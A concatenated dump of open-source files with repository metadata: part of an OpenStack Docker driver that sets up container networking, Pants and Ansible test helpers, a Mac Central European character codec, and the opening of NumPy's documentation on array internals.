'hypervisor_hostname': self._nodename,
'cpu_info': '?',
'supported_instances': jsonutils.dumps([
('i686', 'docker', 'lxc'),
('x86_64', 'docker', 'lxc')
])
}
return stats
def _find_cgroup_devices_path(self):
for ln in open('/proc/mounts'):
if ln.startswith('cgroup ') and 'devices' in ln:
return ln.split(' ')[1]
def _find_container_pid(self, container_id):
cgroup_path = self._find_cgroup_devices_path()
lxc_path = os.path.join(cgroup_path, 'lxc')
tasks_path = os.path.join(lxc_path, container_id, 'tasks')
n = 0
while True:
# NOTE(samalba): We wait for the process to be spawned inside the
# container in order to get the the "container pid". This is
# usually really fast. To avoid race conditions on a slow
# machine, we allow 10 seconds as a hard limit.
if n > 20:
return
try:
with open(tasks_path) as f:
pids = f.readlines()
if pids:
return int(pids[0].strip())
except IOError:
pass
time.sleep(0.5)
n += 1
def _find_fixed_ip(self, subnets):
for subnet in subnets:
for ip in subnet['ips']:
if ip['type'] == 'fixed' and ip['address']:
return ip['address']
def _setup_network(self, instance, network_info):
if not network_info:
return
container_id = self.find_container_by_name(instance['name']).get('id')
if not container_id:
return
network_info = network_info[0]['network']
netns_path = '/var/run/netns'
if not os.path.exists(netns_path):
utils.execute(
'mkdir', '-p', netns_path, run_as_root=True)
nspid = self._find_container_pid(container_id)
if not nspid:
msg = _('Cannot find any PID under container "{0}"')
raise RuntimeError(msg.format(container_id))
netns_path = os.path.join(netns_path, container_id)
utils.execute(
'ln', '-sf', '/proc/{0}/ns/net'.format(nspid),
'/var/run/netns/{0}'.format(container_id),
run_as_root=True)
rand = random.randint(0, 100000)
if_local_name = 'pvnetl{0}'.format(rand)
if_remote_name = 'pvnetr{0}'.format(rand)
bridge = network_info['bridge']
ip = self._find_fixed_ip(network_info['subnets'])
if not ip:
raise RuntimeError(_('Cannot set fixed ip'))
undo_mgr = utils.UndoManager()
try:
utils.execute(
'ip', 'link', 'add', 'name', if_local_name, 'type',
'veth', 'peer', 'name', if_remote_name,
run_as_root=True)
undo_mgr.undo_with(lambda: utils.execute(
'ip', 'link', 'delete', if_local_name, run_as_root=True))
# NOTE(samalba): Deleting the interface will delete all associated
# resources (remove from the bridge, its pair, etc...)
utils.execute(
'brctl', 'addif', bridge, if_local_name,
run_as_root=True)
utils.execute(
'ip', 'link', 'set', if_local_name, 'up',
run_as_root=True)
utils.execute(
'ip', 'link', 'set', if_remote_name, 'netns', nspid,
run_as_root=True)
utils.execute(
'ip', 'netns', 'exec', container_id, 'ifconfig',
if_remote_name, ip,
run_as_root=True)
except Exception:
msg = _('Failed to setup the network, rolling back')
undo_mgr.rollback_and_reraise(msg=msg, instance=instance)
def _get_memory_limit_bytes(self, instance):
for metadata in instance.get('system_metadata', []):
if metadata['deleted']:
continue
if metadata['key'] == 'instance_type_memory_mb':
return int(metadata['value']) * 1024 * 1024
return 0
def _get_image_name(self, context, instance, image):
fmt = image['container_format']
if fmt != 'docker':
msg = _('Image container format not supported ({0})')
raise exception.InstanceDeployFailure(msg.format(fmt),
instance_id=instance['name'])
registry_port = self._get_registry_port()
return '{0}:{1}/{2}'.format(CONF.my_ip,
registry_port,
image['name'])
def _get_default_cmd(self, image_name):
default_cmd = ['sh']
info = self.docker.inspect_image(image_name)
if not info:
return default_cmd
if not info['container_config']['Cmd']:
return default_cmd
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
image_name = self._get_image_name(context, instance, image_meta)
args = {
'Hostname': instance['name'],
'Image': image_name,
'Memory': self._get_memory_limit_bytes(instance)
}
default_cmd = self._get_default_cmd(image_name)
if default_cmd:
args['Cmd'] = default_cmd
container_id = self.docker.create_container(args)
if not container_id:
msg = _('Image name "{0}" does not exist, fetching it...')
LOG.info(msg.format(image_name))
res = self.docker.pull_repository(image_name)
if res is False:
raise exception.InstanceDeployFailure(
_('Cannot pull missing image'),
instance_id=instance['name'])
container_id = self.docker.create_container(args)
if not container_id:
raise exception.InstanceDeployFailure(
_('Cannot create container'),
instance_id=instance['name'])
self.docker.start_container(container_id)
try:
self._setup_network(instance, network_info)
except Exception as e:
msg = _('Cannot setup network: {0}')
raise exception.InstanceDeployFailure(msg.format(e),
instance_id=instance['name'])
def destroy(self, instance, network_info, block_device_info=None,
destroy_disks=True):
container_id = self.find_container_by_name(instance['name']).get('id')
if not container_id:
return
self.docker.stop_container(container_id)
self.docker.destroy_container(container_id)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
container_id = self.find_container_by_name(instance['name']).get('id')
if not container_id:
return
if not self.docker.stop_container(container_id):
LOG.warning(_('Cannot stop the container, '
'please check docker logs'))
if not self.docker.start_container(container_id):
LOG.warning(_('Cannot restart the container, '
'please check docker logs'))
def power_on(self, context, instance, network_info, block_device_info):
container_id = self.find_container_by_name(instance['name']).get('id')
if not container_id:
return
self.docker.start_container(container_id)
def power_off(self, instance):
container_id = self.find_container_by_name(instance['name']).get('id')
if not container_id:
return
self.docker.stop_container(container_id)
def get_console_output(self, instance):
container_id = self.find_container_by_name(instance['name']).get('id')
if not container_id:
return
return self.docker.get_container_logs(container_id)
def _get_registry_port(self):
default_port = CONF.docker_registry_default_port
registry = None
for container in self.docker.list_containers(_all=False):
container = self.docker.inspect_container(container['id'])
if 'docker-registry' in container['Path']:
registry = container
break
if not registry:
return default_port
# NOTE(samalba): The registry service always binds on port 5000 in the
# container
try:
return container['NetworkSettings']['PortMapping']['Tcp']['5000']
except (KeyError, TypeError):
# NOTE(samalba): Falling back to a default port allows more
# flexibility (run docker-registry outside a container)
return default_port
def snapshot(self, context, instance, image_href, update_task_state):
container_id = self.find_container_by_name(instance['name']).get('id')
if not container_id:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
(image_service, image_id) = glance.get_remote_image_service(
context, image_href)
image = image_service.show(context, image_id)
registry_port = self._get_registry_port()
name = image['name']
default_tag = (':' not in name)
name = '{0}:{1}/{2}'.format(CONF.my_ip,
registry_port,
name)
commit_name = name if not default_tag else name + ':latest'
self.docker.commit_container(container_id, commit_name)
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
headers = {'X-Meta-Glance-Image-Id': image_href}
self.docker.push_repository(name, headers=headers)
| apache-2.0 |
dturner-tw/pants | tests/python/pants_test/base/context_utils.py | 2 | 3629 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import sys
from contextlib import contextmanager
from twitter.common.collections import maybe_list
from pants.base.workunit import WorkUnit
from pants.build_graph.target import Target
from pants.goal.context import Context
from pants_test.option.util.fakes import create_options
class TestContext(Context):
"""A Context to use during unittesting.
Stubs out various dependencies that we don't want to introduce in unit tests.
TODO: Instead of extending the runtime Context class, create a Context interface and have
TestContext and a runtime Context implementation extend that. This will also allow us to
isolate the parts of the interface that a Task is allowed to use vs. the parts that the
task-running machinery is allowed to use.
"""
class DummyWorkUnit(object):
"""A workunit stand-in that sends all output to stderr.
These outputs are typically only used by subprocesses spawned by code under test, not
the code under test itself, and would otherwise go into some reporting black hole. The
testing framework will only display the stderr output when a test fails.
Provides no other tracking/labeling/reporting functionality. Does not require "opening"
or "closing".
"""
def output(self, name):
return sys.stderr
def set_outcome(self, outcome):
return sys.stderr.write('\nWorkUnit outcome: {}\n'.format(WorkUnit.outcome_string(outcome)))
class DummyRunTracker(object):
"""A runtracker stand-in that does no actual tracking."""
class DummyArtifactCacheStats(object):
def add_hits(self, cache_name, targets): pass
def add_misses(self, cache_name, targets, causes): pass
artifact_cache_stats = DummyArtifactCacheStats()
@contextmanager
def new_workunit(self, name, labels=None, cmd='', log_config=None):
sys.stderr.write('\nStarting workunit {}\n'.format(name))
yield TestContext.DummyWorkUnit()
@property
def log(self):
return logging.getLogger('test')
def submit_background_work_chain(self, work_chain, parent_workunit_name=None):
# Just do the work synchronously, so we don't need a run tracker, background workers and so on.
for work in work_chain:
for args_tuple in work.args_tuples:
work.func(*args_tuple)
def subproc_map(self, f, items):
# Just execute in-process.
return map(f, items)
# TODO: Make Console and Workspace into subsystems, and simplify this signature.
def create_context(options=None, passthru_args=None, target_roots=None, build_graph=None,
build_file_parser=None, address_mapper=None,
console_outstream=None, workspace=None):
"""Creates a ``Context`` with no options or targets by default.
:param options: A map of scope -> (map of key to value).
Other params are as for ``Context``.
"""
options = create_options(options or {}, passthru_args=passthru_args)
run_tracker = TestContext.DummyRunTracker()
target_roots = maybe_list(target_roots, Target) if target_roots else []
return TestContext(options=options, run_tracker=run_tracker, target_roots=target_roots,
build_graph=build_graph, build_file_parser=build_file_parser,
address_mapper=address_mapper, console_outstream=console_outstream,
workspace=workspace)
| apache-2.0 |
alexlo03/ansible | test/units/mock/vault_helper.py | 206 | 1559 | # Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils._text import to_bytes
from ansible.parsing.vault import VaultSecret
class TextVaultSecret(VaultSecret):
'''A secret piece of text. ie, a password. Tracks text encoding.
The text encoding of the text may not be the default text encoding so
we keep track of the encoding so we encode it to the same bytes.'''
def __init__(self, text, encoding=None, errors=None, _bytes=None):
super(TextVaultSecret, self).__init__()
self.text = text
self.encoding = encoding or 'utf-8'
self._bytes = _bytes
self.errors = errors or 'strict'
@property
def bytes(self):
'''The text encoded with encoding, unless we specifically set _bytes.'''
return self._bytes or to_bytes(self.text, encoding=self.encoding, errors=self.errors)
| gpl-3.0 |
kubaszostak/gdal-dragndrop | osgeo/apps/Python27/Lib/encodings/mac_centeuro.py | 93 | 14665 | """ Python Character Mapping Codec mac_centeuro generated from 'MAPPINGS/VENDORS/APPLE/CENTEURO.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-centeuro',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\u0100' # 0x81 -> LATIN CAPITAL LETTER A WITH MACRON
u'\u0101' # 0x82 -> LATIN SMALL LETTER A WITH MACRON
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\u0104' # 0x84 -> LATIN CAPITAL LETTER A WITH OGONEK
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\u0105' # 0x88 -> LATIN SMALL LETTER A WITH OGONEK
u'\u010c' # 0x89 -> LATIN CAPITAL LETTER C WITH CARON
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u010d' # 0x8B -> LATIN SMALL LETTER C WITH CARON
u'\u0106' # 0x8C -> LATIN CAPITAL LETTER C WITH ACUTE
u'\u0107' # 0x8D -> LATIN SMALL LETTER C WITH ACUTE
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\u0179' # 0x8F -> LATIN CAPITAL LETTER Z WITH ACUTE
u'\u017a' # 0x90 -> LATIN SMALL LETTER Z WITH ACUTE
u'\u010e' # 0x91 -> LATIN CAPITAL LETTER D WITH CARON
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\u010f' # 0x93 -> LATIN SMALL LETTER D WITH CARON
u'\u0112' # 0x94 -> LATIN CAPITAL LETTER E WITH MACRON
u'\u0113' # 0x95 -> LATIN SMALL LETTER E WITH MACRON
u'\u0116' # 0x96 -> LATIN CAPITAL LETTER E WITH DOT ABOVE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\u0117' # 0x98 -> LATIN SMALL LETTER E WITH DOT ABOVE
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf5' # 0x9B -> LATIN SMALL LETTER O WITH TILDE
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\u011a' # 0x9D -> LATIN CAPITAL LETTER E WITH CARON
u'\u011b' # 0x9E -> LATIN SMALL LETTER E WITH CARON
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u2020' # 0xA0 -> DAGGER
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\u0118' # 0xA2 -> LATIN CAPITAL LETTER E WITH OGONEK
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\xdf' # 0xA7 -> LATIN SMALL LETTER SHARP S
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\u0119' # 0xAB -> LATIN SMALL LETTER E WITH OGONEK
u'\xa8' # 0xAC -> DIAERESIS
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\u0123' # 0xAE -> LATIN SMALL LETTER G WITH CEDILLA
u'\u012e' # 0xAF -> LATIN CAPITAL LETTER I WITH OGONEK
u'\u012f' # 0xB0 -> LATIN SMALL LETTER I WITH OGONEK
u'\u012a' # 0xB1 -> LATIN CAPITAL LETTER I WITH MACRON
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\u012b' # 0xB4 -> LATIN SMALL LETTER I WITH MACRON
u'\u0136' # 0xB5 -> LATIN CAPITAL LETTER K WITH CEDILLA
u'\u2202' # 0xB6 -> PARTIAL DIFFERENTIAL
u'\u2211' # 0xB7 -> N-ARY SUMMATION
u'\u0142' # 0xB8 -> LATIN SMALL LETTER L WITH STROKE
u'\u013b' # 0xB9 -> LATIN CAPITAL LETTER L WITH CEDILLA
u'\u013c' # 0xBA -> LATIN SMALL LETTER L WITH CEDILLA
u'\u013d' # 0xBB -> LATIN CAPITAL LETTER L WITH CARON
u'\u013e' # 0xBC -> LATIN SMALL LETTER L WITH CARON
u'\u0139' # 0xBD -> LATIN CAPITAL LETTER L WITH ACUTE
u'\u013a' # 0xBE -> LATIN SMALL LETTER L WITH ACUTE
u'\u0145' # 0xBF -> LATIN CAPITAL LETTER N WITH CEDILLA
u'\u0146' # 0xC0 -> LATIN SMALL LETTER N WITH CEDILLA
u'\u0143' # 0xC1 -> LATIN CAPITAL LETTER N WITH ACUTE
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0144' # 0xC4 -> LATIN SMALL LETTER N WITH ACUTE
u'\u0147' # 0xC5 -> LATIN CAPITAL LETTER N WITH CARON
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\u0148' # 0xCB -> LATIN SMALL LETTER N WITH CARON
u'\u0150' # 0xCC -> LATIN CAPITAL LETTER O WITH DOUBLE ACUTE
u'\xd5' # 0xCD -> LATIN CAPITAL LETTER O WITH TILDE
u'\u0151' # 0xCE -> LATIN SMALL LETTER O WITH DOUBLE ACUTE
u'\u014c' # 0xCF -> LATIN CAPITAL LETTER O WITH MACRON
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u25ca' # 0xD7 -> LOZENGE
u'\u014d' # 0xD8 -> LATIN SMALL LETTER O WITH MACRON
u'\u0154' # 0xD9 -> LATIN CAPITAL LETTER R WITH ACUTE
u'\u0155' # 0xDA -> LATIN SMALL LETTER R WITH ACUTE
u'\u0158' # 0xDB -> LATIN CAPITAL LETTER R WITH CARON
u'\u2039' # 0xDC -> SINGLE LEFT-POINTING ANGLE QUOTATION MARK
u'\u203a' # 0xDD -> SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
u'\u0159' # 0xDE -> LATIN SMALL LETTER R WITH CARON
u'\u0156' # 0xDF -> LATIN CAPITAL LETTER R WITH CEDILLA
u'\u0157' # 0xE0 -> LATIN SMALL LETTER R WITH CEDILLA
u'\u0160' # 0xE1 -> LATIN CAPITAL LETTER S WITH CARON
u'\u201a' # 0xE2 -> SINGLE LOW-9 QUOTATION MARK
u'\u201e' # 0xE3 -> DOUBLE LOW-9 QUOTATION MARK
u'\u0161' # 0xE4 -> LATIN SMALL LETTER S WITH CARON
u'\u015a' # 0xE5 -> LATIN CAPITAL LETTER S WITH ACUTE
u'\u015b' # 0xE6 -> LATIN SMALL LETTER S WITH ACUTE
u'\xc1' # 0xE7 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\u0164' # 0xE8 -> LATIN CAPITAL LETTER T WITH CARON
u'\u0165' # 0xE9 -> LATIN SMALL LETTER T WITH CARON
u'\xcd' # 0xEA -> LATIN CAPITAL LETTER I WITH ACUTE
u'\u017d' # 0xEB -> LATIN CAPITAL LETTER Z WITH CARON
u'\u017e' # 0xEC -> LATIN SMALL LETTER Z WITH CARON
u'\u016a' # 0xED -> LATIN CAPITAL LETTER U WITH MACRON
u'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xEF -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\u016b' # 0xF0 -> LATIN SMALL LETTER U WITH MACRON
u'\u016e' # 0xF1 -> LATIN CAPITAL LETTER U WITH RING ABOVE
u'\xda' # 0xF2 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\u016f' # 0xF3 -> LATIN SMALL LETTER U WITH RING ABOVE
u'\u0170' # 0xF4 -> LATIN CAPITAL LETTER U WITH DOUBLE ACUTE
u'\u0171' # 0xF5 -> LATIN SMALL LETTER U WITH DOUBLE ACUTE
u'\u0172' # 0xF6 -> LATIN CAPITAL LETTER U WITH OGONEK
u'\u0173' # 0xF7 -> LATIN SMALL LETTER U WITH OGONEK
u'\xdd' # 0xF8 -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\xfd' # 0xF9 -> LATIN SMALL LETTER Y WITH ACUTE
u'\u0137' # 0xFA -> LATIN SMALL LETTER K WITH CEDILLA
u'\u017b' # 0xFB -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\u0141' # 0xFC -> LATIN CAPITAL LETTER L WITH STROKE
u'\u017c' # 0xFD -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\u0122' # 0xFE -> LATIN CAPITAL LETTER G WITH CEDILLA
u'\u02c7' # 0xFF -> CARON
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| mit |
saquiba2/numpytry | numpy/doc/internals.py | 163 | 9673 | """
===============
Array Internals
===============
Internal organization of numpy arrays
=====================================
It helps to understand a bit about how numpy arrays are handled under the covers to help understand numpy better. This section will not go into great detail. Those wishing to understand the full details are referred to Travis Oliphant's book "Guide to Numpy".
Numpy arrays consist of two major components, the raw array data (from now on,
referred to as the data buffer), and the information about the raw array data.
The data buffer is typically what people think of as arrays in C or Fortran,
a contiguous (and fixed) block of memory containing fixed sized data items.
Numpy also contains a significant set of data that describes how to interpret
the data in the data buffer. This extra information contains (among other things):
1) The basic data element's size in bytes
2) The start of the data within the data buffer (an offset relative to the
beginning of the data buffer).
3) The number of dimensions and the size of each dimension
4) The separation between elements for each dimension (the 'stride'). This
does not have to be a multiple of the element size
5) The byte order of the data (which may not be the native byte order)
6) Whether the buffer is read-only
7) Information (via the dtype object) about the interpretation of the basic
data element. The basic data element may be as simple as a int or a float,
or it may be a compound object (e.g., struct-like), a fixed character field,
or Python object pointers.
8) Whether the array is to interpreted as C-order or Fortran-order.
This arrangement allow for very flexible use of arrays. One thing that it allows
is simple changes of the metadata to change the interpretation of the array buffer.
Changing the byteorder of the array is a simple change involving no rearrangement
of the data. The shape of the array can be changed very easily without changing
anything in the data buffer or any data copying at all
Among other things that are made possible is one can create a new array metadata
object that uses the same data buffer
to create a new view of that data buffer that has a different interpretation
of the buffer (e.g., different shape, offset, byte order, strides, etc) but
shares the same data bytes. Many operations in numpy do just this such as
slices. Other operations, such as transpose, don't move data elements
around in the array, but rather change the information about the shape and strides so that the indexing of the array changes, but the data in the doesn't move.
Typically these new versions of the array metadata but the same data buffer are
new 'views' into the data buffer. There is a different ndarray object, but it
uses the same data buffer. This is why it is necessary to force copies through
use of the .copy() method if one really wants to make a new and independent
copy of the data buffer.
New views into arrays mean the the object reference counts for the data buffer
increase. Simply doing away with the original array object will not remove the
data buffer if other views of it still exist.
Multidimensional Array Indexing Order Issues
============================================
What is the right way to index
multi-dimensional arrays? Before you jump to conclusions about the one and
true way to index multi-dimensional arrays, it pays to understand why this is
a confusing issue. This section will try to explain in detail how numpy
indexing works and why we adopt the convention we do for images, and when it
may be appropriate to adopt other conventions.
The first thing to understand is
that there are two conflicting conventions for indexing 2-dimensional arrays.
Matrix notation uses the first index to indicate which row is being selected and
the second index to indicate which column is selected. This is opposite the
geometrically oriented-convention for images where people generally think the
first index represents x position (i.e., column) and the second represents y
position (i.e., row). This alone is the source of much confusion;
matrix-oriented users and image-oriented users expect two different things with
regard to indexing.
The second issue to understand is how indices correspond
to the order the array is stored in memory. In Fortran the first index is the
most rapidly varying index when moving through the elements of a two
dimensional array as it is stored in memory. If you adopt the matrix
convention for indexing, then this means the matrix is stored one column at a
time (since the first index moves to the next row as it changes). Thus Fortran
is considered a Column-major language. C has just the opposite convention. In
C, the last index changes most rapidly as one moves through the array as
